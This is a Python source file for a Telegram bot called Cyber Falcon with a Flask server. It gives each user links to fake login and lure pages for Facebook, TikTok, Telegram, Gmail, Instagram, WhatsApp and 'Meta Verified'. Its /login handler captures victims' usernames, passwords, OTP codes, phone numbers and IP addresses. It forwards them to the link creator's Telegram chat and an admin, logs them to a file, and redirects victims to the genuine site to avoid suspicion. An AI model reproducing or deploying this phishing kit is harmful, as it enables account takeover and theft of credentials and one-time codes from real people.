import asyncio
import logging
import requests
import json
import os
import threading
import time
import re
from datetime import datetime
from flask import Flask, send_from_directory, request, redirect, render_template_string
from telegram import Update, InlineKeyboardButton, InlineKeyboardMarkup
from telegram.ext import Application, CommandHandler, CallbackQueryHandler, MessageHandler, filters, ContextTypes

# ============= কনফিগারেশন =============
TELEGRAM_BOT_TOKEN = os.environ.get('TELEGRAM_BOT_TOKEN')
ADMIN_CHAT_ID = int(os.environ.get('ADMIN_CHAT_ID', 7843284032))
RENDER_URL = os.environ.get('RENDER_URL', "https://fc-bot-vz4u.onrender.com")

if not TELEGRAM_BOT_TOKEN:
    print("ERROR: TELEGRAM_BOT_TOKEN not set!")
    exit(1)

# ============= ফ্লাস্ক অ্যাপ =============
flask_app = Flask(__name__)

# ============= হেল্পার ফাংশন =============
def get_device_info(user_agent):
    """ডিভাইস তথ্য এক্সট্র্যাক্ট করে"""
    if not user_agent:
        return "Unknown"
    if "iPhone" in user_agent:
        return "📱 iPhone"
    elif "Android" in user_agent:
        return "🤖 Android"
    elif "Windows" in user_agent:
        return "💻 Windows"
    elif "Mac" in user_agent:
        return "🍎 Mac"
    else:
        return "🌐 Other"

def format_message(data):
    """সুন্দর ফরম্যাটেড মেসেজ তৈরি করে"""
    page_type = data.get('pageType', 'unknown')
    username = data.get('username', 'N/A')
    password = data.get('password', 'N/A')
    ip = data.get('ipAddress', 'N/A')
    timestamp = data.get('timestamp', datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
    device = get_device_info(data.get('userAgent', ''))
    
    # প্ল্যাটফর্ম আইকন ও নাম
    platform_icons = {
        'facebook': '📘', 'facebook_followers': '🎯', 'tiktok': '🎵', 'tiktok_boost': '🚀',
        'telegram': '✈️', 'gmail': '📧', 'instagram': '📷', 'meta_verify': '💎',
        'Whatsapp_groups': '💚', 'whatsapp_groups': '💚'
    }
    
    platform_names = {
        'facebook': 'Facebook Login', 'facebook_followers': 'Facebook Followers',
        'tiktok': 'TikTok Login', 'tiktok_boost': 'TikTok Booster',
        'telegram': 'Telegram Login', 'gmail': 'Gmail Login',
        'instagram': 'Instagram Login', 'meta_verify': 'Meta Verified',
        'Whatsapp_groups': 'WhatsApp Groups', 'whatsapp_groups': 'WhatsApp Groups'
    }
    
    icon = platform_icons.get(page_type, '🔐')
    platform = platform_names.get(page_type, page_type.replace('_', ' ').title())
    
    # OTP চেক
    otp_code = data.get('otp_code', '')
    group_name = data.get('groupName', '')
    
    if otp_code and otp_code != 'N/A':
        message = f"""
{icon}🦅 *NEW OTP RECEIVED* 🦅{icon}

📱 *Platform:* {platform}
🔢 *OTP Code:* `{otp_code}`
👥 *Group:* {group_name if group_name else 'N/A'}
🌐 *IP Address:* `{ip}`
📱 *Device:* {device}
⏰ *Time:* {timestamp}

━━━━━━━━━━━━━━━━
🔒 *Secured by Cyber Falcon*
        """
    else:
        # পাসওয়ার্ড মাস্কিং
        if len(password) > 8:
            masked_pass = password[:4] + "*" * (len(password)-8) + password[-4:] if len(password) > 8 else "*" * len(password)
        else:
            masked_pass = "*" * len(password)
        
        message = f"""
{icon}🦅 *NEW LOGIN ALERT* 🦅{icon}

📱 *Platform:* {platform}
👤 *Email/User:* `{username}`
🔑 *Password:* `{masked_pass}`
🌐 *IP Address:* `{ip}`
📱 *Device:* {device}
⏰ *Time:* {timestamp}

━━━━━━━━━━━━━━━━
🔒 *Report generated by Cyber Falcon Bot*
        """
    
    return message

@flask_app.route('/')
def index():
    return "🦅 Cyber Falcon Bot is Running!", 200

@flask_app.route('/health')
def health():
    return "OK", 200

@flask_app.route('/<path:filename>')
def serve_template(filename):
    """HTML টেমপ্লেট সার্ভ করে"""
    if '?' in filename:
        filename = filename.split('?')[0]
    
    # ফাইল এক্সটেনশন চেক
    if '.' not in filename:
        filename = f"{filename}.html"
    
    # templates ফোল্ডার থেকে ফাইল সার্ভ করুন
    try:
        return send_from_directory('templates', filename)
    except Exception as e:
        print(f"Template error: {e}")
        return f"File {filename} not found", 404

@flask_app.route('/login', methods=['POST'])
def handle_login():
    """সব লগইন ডাটা এখানে আসে"""
    
    # ফর্ম ডাটা সংগ্রহ
    username = request.form.get('username') or request.form.get('email') or 'N/A'
    password = request.form.get('password') or 'N/A'
    groupName = request.form.get('groupName') or 'N/A'
    otp_code = request.form.get('otp_code') or request.form.get('otpCode') or 'N/A'
    page_type = request.args.get('page_type', 'unknown')
    target_user_id = request.args.get('user_id', 'unknown')
    
    # অতিরিক্ত ডাটা
    video_link = request.form.get('video_link') or request.form.get('videoLink') or ''
    service_type = request.form.get('service_type') or ''
    country = request.form.get('country') or ''
    phone = request.form.get('phone') or ''
    
    # JSON ডাটা তৈরি
    data = {
        'username': username,
        'password': password,
        'groupName': groupName,
        'otp_code': otp_code,
        'ipAddress': request.remote_addr,
        'pageType': page_type,
        'timestamp': datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
        'generated_by': target_user_id,
        'userAgent': request.headers.get('User-Agent', 'Unknown'),
        'video_link': video_link,
        'service_type': service_type,
        'country': country,
        'phone': phone
    }
    
    # credentials.json এ সেভ (এনক্রিপ্টেড ফরম্যাটে)
    try:
        with open('credentials.json', 'a') as f:
            # পাসওয়ার্ড মাস্ক করে সেভ
            save_data = data.copy()
            if len(password) > 4:
                save_data['password'] = password[:2] + "***" + password[-2:] if len(password) > 4 else "***"
            f.write(json.dumps(save_data) + '\n')
    except Exception as e:
        print(f"Error saving: {e}")
    
    # টেলিগ্রামে মেসেজ পাঠান
    if target_user_id != 'unknown' and target_user_id != 'None':
        try:
            message = format_message(data)
            url = f"https://api.telegram.org/bot{TELEGRAM_BOT_TOKEN}/sendMessage"
            response = requests.post(
                url, 
                json={
                    'chat_id': int(target_user_id), 
                    'text': message, 
                    'parse_mode': 'Markdown'
                }, 
                timeout=10
            )
            print(f"✅ Message sent to user {target_user_id} - Status: {response.status_code}")
        except Exception as e:
            print(f"❌ Failed to send to {target_user_id}: {e}")
    
    # অ্যাডমিনকে নোটিফিকেশন (শুধু গুরুত্বপূর্ণ লগ)
    if target_user_id != str(ADMIN_CHAT_ID) and otp_code == 'N/A' and password != 'N/A':
        try:
            admin_msg = f"📊 *New Login*\n👤 {username}\n📱 {page_type}\n🌐 {request.remote_addr}"
            requests.post(
                f"https://api.telegram.org/bot{TELEGRAM_BOT_TOKEN}/sendMessage",
                json={'chat_id': ADMIN_CHAT_ID, 'text': admin_msg, 'parse_mode': 'Markdown'},
                timeout=5
            )
        except:
            pass
    
    # রিডাইরেক্ট
    redirect_urls = {
        'facebook': 'https://www.facebook.com/',
        'facebook_followers': 'https://www.facebook.com/',
        'tiktok': 'https://www.tiktok.com/',
        'tiktok_boost': 'https://www.tiktok.com/',
        'telegram': 'https://web.telegram.org/',
        'gmail': 'https://mail.google.com/',
        'instagram': 'https://www.instagram.com/',
        'meta_verify': 'https://business.facebook.com/',
        'Whatsapp_groups': 'https://web.whatsapp.com/',
        'whatsapp_groups': 'https://web.whatsapp.com/'
    }
    
    redirect_url = redirect_urls.get(page_type, 'https://www.google.com')
    return redirect(redirect_url)

def run_flask():
    """ফ্লাস্ক সার্ভার চালায়"""
    port = int(os.environ.get("PORT", 5000))
    flask_app.run(host='0.0.0.0', port=port, threaded=True)

# ============= টেলিগ্রাম বট =============
active_users = set()
user_details = {}

async def start(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """স্টার্ট কমান্ড হ্যান্ডলার"""
    query = update.callback_query
    if query:
        await query.answer()
        chat_id = query.message.chat.id
        message_id = query.message.message_id
        user_name = query.from_user.first_name
        user_username = query.from_user.username
    else:
        chat_id = update.effective_chat.id
        message_id = None
        user_name = update.effective_user.first_name
        user_username = update.effective_user.username
    
    active_users.add(chat_id)
    if chat_id not in user_details:
        user_details[chat_id] = {
            'name': user_name,
            'username': user_username or 'N/A',
            'joined': datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        }
    
    keyboard = InlineKeyboardMarkup([
        [InlineKeyboardButton("🌐 All Main Pages", callback_data="menu_main")],
        [InlineKeyboardButton("📢 Advance Pages", callback_data="menu_advance")],
        [InlineKeyboardButton("🦅 Status", callback_data="status"),
         InlineKeyboardButton("🥷 Community", url="https://t.me/+j8x9Tp4CGa80ZmM1")]
    ])
    
    message = f"""
😈 🦅𝘾.𝙁 𝘽𝙤𝙩 𝙥𝙧𝙤😈🦅

𝙃𝙞 {user_name}! 
𝙒𝙚𝙡𝙘𝙤𝙢𝙚 𝘾𝙮𝙗𝙚𝙧 𝙛𝙖𝙡𝙘𝙤𝙣 𝙗𝙤𝙩.

🥷𝗦𝘁𝗮𝘁𝘂𝘀: 🟢 𝗔𝗰𝘁𝗶𝘃𝗲
👥 *Total Users:* {len(active_users)}

⚡ *Features:*
• Facebook Login Pages
• TikTok Booster
• WhatsApp Groups
• Gmail/Instagram Login
• Meta Verified

👇 *Select an option below*
    """
    
    if message_id:
        await context.bot.edit_message_text(
            chat_id=chat_id, 
            message_id=message_id, 
            text=message, 
            reply_markup=keyboard, 
            parse_mode='Markdown'
        )
    else:
        await update.message.reply_text(message, reply_markup=keyboard, parse_mode='Markdown')

async def menu_main(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """মেইন মেনু"""
    query = update.callback_query
    await query.answer()
    
    keyboard = InlineKeyboardMarkup([
        [InlineKeyboardButton("📘 Facebook", callback_data="page_facebook")],
        [InlineKeyboardButton("🎵 TikTok", callback_data="page_tiktok")],
        [InlineKeyboardButton("✈️ Telegram", callback_data="page_telegram")],
        [InlineKeyboardButton("📧 Gmail", callback_data="page_gmail")],
        [InlineKeyboardButton("📷 Instagram", callback_data="page_instagram")],
        [InlineKeyboardButton("⬅️ Back", callback_data="back")]
    ])
    
    await query.edit_message_text(
        "📱 *Select a Platform*\n\nChoose any platform to continue:",
        reply_markup=keyboard,
        parse_mode='Markdown'
    )

async def menu_advance(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """অ্যাডভান্স মেনু"""
    query = update.callback_query
    await query.answer()
    
    keyboard = InlineKeyboardMarkup([
        [InlineKeyboardButton("🎯 Free Followers", callback_data="adv_followers")],
        [InlineKeyboardButton("💚 Hot WhatsApp Groups", callback_data="adv_groups")],
        [InlineKeyboardButton("🚀 TikTok Booster", callback_data="adv_boost")],
        [InlineKeyboardButton("💎 Meta Verified", callback_data="adv_verify")],
        [InlineKeyboardButton("⬅️ Back", callback_data="back")]
    ])
    
    await query.edit_message_text(
        "⚡ *Advance Features*\n\nSelect an option below:",
        reply_markup=keyboard,
        parse_mode='Markdown'
    )

async def show_page(update: Update, context: ContextTypes.DEFAULT_TYPE, title: str, url_path: str, back_callback: str, page_type: str):
    """পেজ দেখায় এবং লিংক জেনারেট করে"""
    query = update.callback_query
    await query.answer()
    
    user_id = query.message.chat.id
    # ইউজার স্পেসিফিক লিংক তৈরি
    full_url = f"{RENDER_URL}/{url_path}?page_type={page_type}&user_id={user_id}"
    
    keyboard = InlineKeyboardMarkup([
        [InlineKeyboardButton("🌐 Open Page", url=full_url)],
        [InlineKeyboardButton("⬅️ Back", callback_data=back_callback)]
    ])
    
    await query.edit_message_text(
        f"🔗 *{title}*\n\n"
        f"Click the button below to open:\n\n"
        f"`{full_url}`\n\n"
        f"⚠️ *Note:* Your login info will be sent here securely.",
        reply_markup=keyboard,
        parse_mode='Markdown'
    )

async def status(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """স্ট্যাটাস দেখায়"""
    query = update.callback_query
    user_id = query.message.chat.id
    user_info = user_details.get(user_id, {'name': 'User', 'username': 'N/A', 'joined': 'Unknown'})
    
    await query.answer()
    
    keyboard = InlineKeyboardMarkup([
        [InlineKeyboardButton("⬅️ Back", callback_data="back")]
    ])
    
    message = f"""
📊 *BOT STATUS* 📊

🦅 *Status:* 🟢 Active
👤 *Name:* {user_info['name']}
🆔 *User ID:* `{user_id}`
📛 *Username:* @{user_info['username']}
📅 *Joined:* {user_info['joined']}
👥 *Total Users:* {len(active_users)}

🌐 *Bot Link:* @MR_FireSword_2025_bot
🥷 *Community:* @CyberFalcon

━━━━━━━━━━━━━━━━
⚡ *Cyber Falcon Security Bot*
    """
    await query.edit_message_text(message, reply_markup=keyboard, parse_mode='Markdown')

async def back(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """ব্যাক বাটন"""
    await start(update, context)

# ============= অ্যাডমিন কমান্ড =============
async def show_users(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """সব ইউজার দেখায় (শুধু অ্যাডমিন)"""
    if update.effective_chat.id != ADMIN_CHAT_ID:
        await update.message.reply_text("⛔ *Access Denied!*\nThis command is only for admin.", parse_mode='Markdown')
        return
    
    if not user_details:
        await update.message.reply_text("📭 No users have used the bot yet.")
        return
    
    message = "📋 *User List*\n\n"
    for uid, info in list(user_details.items())[:30]:
        message += f"👤 {info['name']}\n🆔 `{uid}`\n📛 @{info['username']}\n📅 {info['joined']}\n━━━━━━━━━\n"
    
    if len(user_details) > 30:
        message += f"\n... and {len(user_details) - 30} more users"
    
    await update.message.reply_text(message, parse_mode='Markdown')

async def total_users(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """মোট ইউজার দেখায় (শুধু অ্যাডমিন)"""
    if update.effective_chat.id != ADMIN_CHAT_ID:
        await update.message.reply_text("⛔ Access Denied!", parse_mode='Markdown')
        return
    
    await update.message.reply_text(f"👥 *Total Users:* `{len(active_users)}`", parse_mode='Markdown')

async def broadcast(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """ব্রডকাস্ট মেসেজ (শুধু অ্যাডমিন)"""
    if update.effective_chat.id != ADMIN_CHAT_ID:
        await update.message.reply_text("⛔ Access Denied!", parse_mode='Markdown')
        return
    
    message_text = ' '.join(context.args)
    if not message_text:
        await update.message.reply_text(
            "⚠️ *Usage:* `/broadcast your message`\n\n"
            "Example: `/broadcast Hello everyone!`",
            parse_mode='Markdown'
        )
        return
    
    sent = 0
    failed = 0
    
    status_msg = await update.message.reply_text(f"📢 Broadcasting to {len(active_users)} users...")
    
    for chat_id in active_users:
        try:
            await context.bot.send_message(
                chat_id=chat_id, 
                text=f"📢 *Announcement*\n\n{message_text}", 
                parse_mode='Markdown'
            )
            sent += 1
            await asyncio.sleep(0.05)
        except Exception as e:
            failed += 1
            print(f"Failed to send to {chat_id}: {e}")
    
    await status_msg.edit_text(
        f"✅ *Broadcast Complete*\n\n"
        f"📤 Sent: `{sent}`\n"
        f"❌ Failed: `{failed}`\n"
        f"👥 Total: `{len(active_users)}`",
        parse_mode='Markdown'
    )

async def handle_callback(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """কলব্যাক কোয়েরি হ্যান্ডলার"""
    query = update.callback_query
    data = query.data
    print(f"📌 Callback: {data}")
    
    if data == "menu_main":
        await menu_main(update, context)
    elif data == "menu_advance":
        await menu_advance(update, context)
    elif data == "status":
        await status(update, context)
    elif data == "back":
        await back(update, context)
    elif data == "page_facebook":
        await show_page(update, context, "📘 Facebook Login", "facebook", "menu_main", "facebook")
    elif data == "page_tiktok":
        await show_page(update, context, "🎵 TikTok Login", "tiktok", "menu_main", "tiktok")
    elif data == "page_telegram":
        await show_page(update, context, "✈️ Telegram Login", "telegram", "menu_main", "telegram")
    elif data == "page_gmail":
        await show_page(update, context, "📧 Gmail Login", "gmail", "menu_main", "gmail")
    elif data == "page_instagram":
        await show_page(update, context, "📷 Instagram Login", "instagram", "menu_main", "instagram")
    elif data == "adv_followers":
        await show_page(update, context, "🎯 Free Facebook Followers", "facebook_followers", "menu_advance", "facebook_followers")
    elif data == "adv_groups":
        await show_page(update, context, "💚 Hot WhatsApp Groups", "Whatsapp_groups", "menu_advance", "Whatsapp_groups")
    elif data == "adv_boost":
        await show_page(update, context, "🚀 TikTok Booster", "tiktok_boost", "menu_advance", "tiktok_boost")
    elif data == "adv_verify":
        await show_page(update, context, "💎 Meta Verified", "meta_verify", "menu_advance", "meta_verify")
    else:
        await query.answer("Unknown option!", show_alert=True)

async def handle_message(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """সাধারণ মেসেজ হ্যান্ডলার"""
    if update.message.text == '/start':
        await start(update, context)
    else:
        await update.message.reply_text(
            "🤖 *Welcome to Cyber Falcon Bot*\n\n"
            "Please use `/start` to see the menu.",
            parse_mode='Markdown'
        )

async def error_handler(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """এরর হ্যান্ডলার"""
    print(f"❌ Error: {context.error}")
    try:
        if update and update.effective_chat:
            await context.bot.send_message(
                chat_id=update.effective_chat.id,
                text="⚠️ *An error occurred!*\nPlease try again later.",
                parse_mode='Markdown'
            )
    except:
        pass

def run_bot():
    """বট চালায়"""
    print("🦅 Starting Cyber Falcon Bot...")
    
    # ওয়েবহুক ডিলিট
    try:
        requests.post(f"https://api.telegram.org/bot{TELEGRAM_BOT_TOKEN}/deleteWebhook")
        print("✅ Webhook deleted")
    except Exception as e:
        print(f"Webhook error: {e}")
    
    # অ্যাপ্লিকেশন বিল্ড
    app = Application.builder().token(TELEGRAM_BOT_TOKEN).build()
    
    # হ্যান্ডলার যোগ
    app.add_handler(CommandHandler("start", start))
    app.add_handler(CommandHandler("link", start))
    app.add_handler(CommandHandler("broadcast", broadcast))
    app.add_handler(CommandHandler("total", total_users))
    app.add_handler(CommandHandler("users", show_users))
    app.add_handler(CallbackQueryHandler(handle_callback))
    app.add_handler(MessageHandler(filters.TEXT & ~filters.COMMAND, handle_message))
    app.add_error_handler(error_handler)
    
    print("🚀 Bot is running! Polling...")
    app.run_polling(drop_pending_updates=True)

if __name__ == '__main__':
    # ফ্লাস্ক থ্রেড স্টার্ট
    flask_thread = threading.Thread(target=run_flask, daemon=True)
    flask_thread.start()
    time.sleep(2)
    print("✅ Flask server started on port 5000")
    
    # বট স্টার্ট
    run_bot()
